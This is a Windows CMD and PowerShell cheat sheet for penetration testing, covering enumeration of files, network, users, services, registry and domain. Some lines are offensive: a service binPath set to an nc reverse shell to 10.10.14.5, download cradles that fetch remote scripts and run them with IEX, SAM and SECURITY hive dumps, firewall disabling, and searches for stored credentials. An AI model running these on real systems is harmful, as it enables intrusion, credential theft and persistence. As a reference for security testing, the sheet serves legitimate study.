Windows Commands Cheat Sheet
#FILE OPERATIONS
REM === CMD === (throughout this sheet, an inline "REM ..." after a command is a reading annotation only: cmd.exe does not treat REM mid-line as a comment and would pass those words as arguments — use "& REM ..." if a line is pasted verbatim)
REM List directory
dir /a REM all including hidden/system
dir /s /b *.txt REM recursive, bare format
dir /s *pass* *cred* *secret* REM recursive search by name part
REM Permissions
icacls "C:\path" REM view ACL
icacls "C:\path" /grant Everyone:F REM grant full access
icacls "C:\path" /remove Everyone REM remove ACE
icacls "C:\path" /inheritance:r REM remove inherited
takeown /f "C:\path" /r /d y REM take ownership recursive
REM Attributes
attrib +h +s file.txt REM set hidden + system
attrib -h -s file.txt REM clear hidden + system
attrib C:\*.* /s REM view all attributes
REM Copy / Move
copy source dest
move source dest
xcopy "src" "dest" /E /H /C /I /Y REM recursive with hidden
robocopy "src" "dest" /E /COPYALL REM robust copy
REM Find strings
findstr /s /i /p "password" *.txt *.ini
findstr /s /i "admin" C:\inetpub\*.*
findstr /s /i /c:"ConnectionString" *.config
CMD
# === PowerShell ===
# List directory (alias: ls, dir)
Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue
# Find files by name
Get-ChildItem -Path C:\ -Recurse -Force -Filter "*pass*" -ErrorAction SilentlyContinue
# Read file content
Get-Content C:\path\file.txt
gc C:\path\file.txt -Tail 20 # tail equivalent
# Search content
Select-String -Path "C:\*.txt" -Pattern "password"
Get-ChildItem C:\inetpub -Recurse | Select-String "password" | Select -Unique Path
# ACL
Get-Acl -Path "C:\path" | Format-List
POWERSHELL
#NETWORK
REM === CMD ===
ipconfig /all REM full IP config
ipconfig /displaydns REM DNS cache
netstat -ano REM connections (numeric, owning PID)
netstat -anob REM + binary name (admin)
netstat -anp TCP REM TCP only
route print REM routing table
arp -a REM ARP cache
nslookup target.com
nslookup 10.10.10.5 REM reverse lookup
netsh wlan show profiles REM saved WiFi profiles
CMD
# === PowerShell ===
Get-NetIPConfiguration
Get-NetIPAddress | ft
Get-NetRoute | ft
Get-NetTCPConnection | ? State -eq Listen | ft
Test-NetConnection target.com -Port 445
Test-NetConnection 10.10.10.5 -Port 80,443,445,3389
Resolve-DnsName target.com
Get-DnsClientCache
POWERSHELL
#USERS AND GROUPS
REM === CMD ===
whoami /all REM user, groups, privs (comprehensive)
whoami /priv REM privileges only
whoami /groups REM groups only
REM Local users/groups
net user REM list local users
net user username REM user details
net user username password /add /domain REM create domain user
net user username /domain REM domain user details
net localgroup REM list local groups
net localgroup Administrators REM members of local Admin
net localgroup Administrators username /add REM add to local admin
REM Domain users/groups
net user /domain REM list domain users
net group /domain REM list domain groups
net group "Domain Admins" /domain REM list domain admins
net accounts /domain REM domain password policy
CMD
# === PowerShell ===
# Current user
[System.Security.Principal.WindowsIdentity]::GetCurrent()
$env:USERNAME
# Local users
Get-LocalUser | ft Name,Enabled,Description
Get-LocalGroup | ft Name
Get-LocalGroupMember Administrators | ft Name,PrincipalSource
# Domain users (AD module)
Get-ADUser -Filter * -Properties * | select Name,SamAccountName
Get-ADGroup -Filter * | select Name
Get-ADGroupMember "Domain Admins" | select Name
# Without AD module via ADSI
([adsisearcher]"(&(objectCategory=user)(objectClass=user))").FindAll()
([adsisearcher]"(&(objectCategory=group))").FindAll()
# Net equivalent in PS
net user
net localgroup
POWERSHELL
#SERVICES
REM === CMD ===
sc query REM list running services (add "type= service state= all" to include stopped ones)
sc qc servicename REM service config
sc qc servicename REM BINARY_PATH_NAME in the same output is the service binary path (check whether a path containing spaces is quoted)
sc stop servicename
sc start servicename
sc config servicename binPath= "cmd.exe /c nc.exe 10.10.14.5 4444 -e cmd.exe"
wmic service get name,pathname,startmode,state
wmic service where "name='Spooler'" get name,startname,pathname
CMD
# === PowerShell ===
Get-Service | ft Name,Status,DisplayName
Get-Service -Name *sql* | ft
Get-CimInstance -ClassName Win32_Service | ft Name,PathName,StartName,State
Get-CimInstance -ClassName Win32_Service | ? PathName -match " " | ft
Get-Service | ? Status -eq Running | ft
POWERSHELL
#SCHEDULED TASKS
REM === CMD ===
schtasks /query /fo LIST /v REM all tasks, verbose
schtasks /query /tn "TaskName" /fo LIST /v REM specific task
schtasks /query /fo TABLE | findstr /i "admin"
CMD
# === PowerShell ===
Get-ScheduledTask | ft TaskName,State
Get-ScheduledTask | ? TaskPath -notmatch "Microsoft" | ft TaskName,TaskPath
Get-ScheduledTask | Get-ScheduledTaskInfo | ft TaskName,LastRunTime
schtasks /query /fo csv | ConvertFrom-Csv | ? TaskName -match "Admin"
POWERSHELL
#REGISTRY
REM === CMD ===
reg query HKLM REM local machine root
reg query HKCU REM current user root
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion /s
reg query HKLM\SYSTEM\CurrentControlSet\Services
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s
REM AlwaysInstallElevated check
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
REM Save hives (requires administrator)
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
reg save HKLM\SECURITY security.hive
REM AutoRun persistence
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REM LSA secrets (HKLM\SECURITY is readable only by SYSTEM by default; an ordinary administrator gets access denied on a query)
reg query HKLM\SECURITY\Policy\Secrets
REM Credential manager
cmdkey /list
vaultcmd /listcreds:"Windows Credentials"
CMD
#FIREWALL
REM === CMD ===
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all dir=in
netsh advfirewall firewall add rule name="Open 4444" dir=in action=allow protocol=TCP localport=4444
netsh advfirewall set allprofiles state off REM disable firewall (admin)
netsh firewall show state REM old syntax
CMD
# === PowerShell ===
Get-NetFirewallProfile | ft Name,Enabled
Get-NetFirewallRule | ft Name,Enabled,Direction,Action
Get-NetFirewallRule | ? Direction -eq Inbound | ? Action -eq Allow | ft Name,LocalPort
New-NetFirewallRule -DisplayName "Allow 4444" -Direction Inbound -Protocol TCP -LocalPort 4444 -Action Allow
Set-NetFirewallProfile -All -Enabled False # disable firewall on all profiles (admin)
POWERSHELL
#DOMAIN ENUMERATION
REM === CMD ===
nltest /dclist:domain.local REM list DCs
nltest /dsgetdc:domain.local REM locate a DC for the domain (add /pdc to get the PDC emulator specifically)
set l REM show variables starting with L (LOGONSERVER = logon server)
set u REM show variables starting with U (USERDOMAIN = domain name, USERNAME)
net view /domain REM list domains
net view /domain:domainname REM list computers in domain
net time /domain REM check DC time
net time \\DC REM time on a specific DC
REM Trusts
nltest /domain_trusts
nltest /domain_trusts /all_trusts
REM Logged-on sessions on a specific remote server (queries SERVERNAME only, not domain-wide)
query user /server:SERVERNAME
CMD
# === PowerShell ===
Get-ADDomain | ft Name,DomainMode,Forest
Get-ADDomainController -Filter * | ft Name,Site,IPv4Address
Get-ADTrust -Filter *
Get-ADUser -Filter * -Properties MemberOf | ? MemberOf -like "*Domain Admins*"
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
POWERSHELL
#PROCESS AND SYSTEM INFO
REM === CMD ===
tasklist REM list processes
tasklist /svc REM processes + services
tasklist /v REM verbose
tasklist /m ntdll.dll REM processes loading specific DLL
tasklist /fi "USERNAME eq NT AUTHORITY\SYSTEM"
wmic process list brief
wmic process get name,processid,executablepath
wmic qfe get Caption,Description,HotFixID,InstalledOn REM installed patches (wmic is deprecated on current Windows; Get-HotFix below is the supported equivalent)
systeminfo REM full system info
systeminfo | findstr /i "os name version hotfix"
driverquery /v REM installed drivers
set REM environment variables
CMD
# === PowerShell ===
Get-Process | ft Name,Id,Path,SessionId
Get-Process -IncludeUserName | ft Name,UserName,Id
Get-HotFix | ft HotFixID,InstalledOn,Description
Get-HotFix -Id "KB4012212" # check specific patch
Get-ComputerInfo | fl
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | ft DisplayName
POWERSHELL
#POWERSHELL ENUMERATION CMDLETS - QUICK REFERENCE
Get-Process # running processes
Get-Service # services
Get-HotFix # installed patches
Get-NetFirewallRule # firewall rules
Get-ExecutionPolicy # PS execution policy
Get-ChildItem Env: # environment variables
Get-LocalUser # local users
Get-LocalGroup # local groups
Get-NetIPConfiguration # network config
Get-NetTCPConnection # network connections
Get-ScheduledTask # scheduled tasks
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* # installed software
Get-WmiObject Win32_LogicalDisk | ft DeviceID,FreeSpace,Size # disk info (Get-WmiObject is legacy; Get-CimInstance is the current equivalent)
Get-WmiObject Win32_QuickFixEngineering # patches (alt)
Get-CimInstance Win32_OperatingSystem | fl Version,BuildNumber,OSArchitecture
POWERSHELL
#USEFUL CMD ONE-LINERS
REM Check if domain-joined
systeminfo | findstr /i "domain" & whoami /all | findstr /i "domain"
REM Dump DNS cache
ipconfig /displaydns > dns_dump.txt
REM Quick file search for creds
dir /s /b C:\*pass* C:\*cred* C:\*.config C:\*.ini 2>nul
REM Check always elevated installer (both must be 0x1)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
REM Find unquoted service paths
wmic service get name,displayname,pathname,startmode 2>nul | findstr /i "Auto" 2>nul | findstr /i /v "C:\Windows\\" 2>nul | findstr /i /v """
REM Check UAC
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
CMD
#POWERSHELL DOWNLOAD CRADLES
# === Various download methods ===
(New-Object Net.WebClient).DownloadString("http://10.10.14.5/script.ps1") | IEX
(New-Object Net.WebClient).DownloadFile("http://10.10.14.5/nc.exe","C:\temp\nc.exe")
IEX (iwr http://10.10.14.5/script.ps1 -UseBasicParsing)
wget http://10.10.14.5/file.exe -OutFile C:\temp\file.exe
# BITS transfer
Start-BitsTransfer -Source http://10.10.14.5/file.exe -Destination C:\temp\file.exe
# Certutil
certutil -urlcache -f http://10.10.14.5/file.exe C:\temp\file.exe
# Invoke-RestMethod
Invoke-RestMethod -Uri http://10.10.14.5:8000/file.txt
POWERSHELL
#APPLOCKER AND DEFENDER ENUMERATION
# AppLocker and Defender enumeration
Get-AppLockerPolicy -Effective # Check AppLocker policy
Get-MpPreference | select ExclusionPath, ExclusionExtension, ExclusionProcess # Defender exclusions
# WMI-based enumeration (alternative to cmd.exe tools)
Get-CimInstance -ClassName Win32_OperatingSystem # OS info
Get-CimInstance -ClassName Win32_Service | select Name,State,StartMode # Services
POWERSHELL
#CREDENTIAL HUNTING VIA POWERSHELL
# Credential hunting via PowerShell
Select-String -Path C:\Users\*\Desktop\*.txt -Pattern "password|pass|pwd" # Search files for passwords
Get-ChildItem -Path C:\ -Include *.xml,*.ini,*.txt -Recurse -ErrorAction SilentlyContinue | Select-String "password"
POWERSHELL
#INSTALLED SOFTWARE AND SHARES
# Installed software
wmic product get name,version # List installed software (slow; also triggers a Windows Installer consistency check on every MSI product, which is logged and can repair/reconfigure them — prefer the registry method below)
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*" | select DisplayName,DisplayVersion # Registry method (faster)
# Share enumeration
net share # List local shares
Get-SmbShare # PowerShell share enumeration
POWERSHELL